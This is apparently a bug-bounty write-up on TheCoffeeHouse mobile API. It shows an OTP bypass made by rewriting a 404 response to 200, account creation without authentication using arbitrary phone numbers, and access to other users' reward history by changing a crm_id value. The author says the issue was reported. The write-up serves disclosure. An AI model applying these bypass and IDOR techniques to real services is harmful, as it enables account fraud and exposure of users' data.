[Bug!Bounty] Missing Authentication in TheCoffeeHouse Api

It was on a Sunday night and I couldn’t sleep: ((

ByPass OTP to walkthrough screen regiester new account

When user input there phone number to login and click next. The OTP will be sent to this phone number and app call screen input OTP. When you input correct OT and If the phone was existed, the data of user with phone would send. Else if the phone wasnot existed, the app would call screen input name, first name, last name, birthday to create new user. And when input wrong OTP, app message notfound.

Response for Existed Phone & Correct OTP

Response for Wrong OTP

Response for Not existed Phone & Correct OTP

A trick when pentest Api that is change HTTP Status Code!!

After i know the api working. I will try input not existed phone & input wrong OTP. The respone was:

HTTP/1.1 404 Not Found
Cache-Control: no-cache, private
Content-Length: 41
Content-Type: application/json
Date: Sun, 15 Mar 2020 17:35:44 GMT
Server: swoole-http-server
Vary: Origin
X-Ratelimit-Limit: 0
X-Ratelimit-Remaining: 0
X-Ratelimit-Reset: 0
Connection: close

{“message”:”Not Found”,”status_code”:404}

I using trick and change response to:

HTTP/1.1 200 OK
Cache-Control: no-cache, private
Content-Length: 39
Content-Type: application/json
Date: Sun, 15 Mar 2020 17:36:52 GMT
Server: swoole-http-server
Vary: Origin
X-Ratelimit-Limit: 0
X-Ratelimit-Remaining: 0
X-Ratelimit-Reset: 0
Connection: close

{“message”:”Success”,”status_code”:200}

Oppp!! It working. The app call screnn input for new user. And the magic lies in the next part of the article. :D :D

Regiester new account withouth authentication

After I bypass the OTP and input all form to create new user. At the request to create for new user i found that the request will sent without OTP code. That means you can hold that request to create a user with an arbitrary phone number and data without having to go through the app or OTP authentication.

Request for create user withouth any authentication

Response for create user withouth any authentication

Well well, You can make a poc base on request.!!

View history BEAN reward of any userid without authentication

After I went to around app and check some function in api. I found that function View history BEAN reward was got data history of user through param #crm_id. So i will try change another #crm_id different than #crm_id of user. Current #crm_id = 10xxxx . And the more special thing is that you don’t need authentication to see it

Request & Response for get BEAN reward type claim with crm_id=6xxxx

Request & Response for get BEAN exchange type claim with crm_id=6xxxx

Note: To do all action that you need bypass SSL Pinning!!

I also emailed them about this problem, but perhaps they fixed it without asking me where the bug was or maybe they realized it wasn’t serious. Hihi.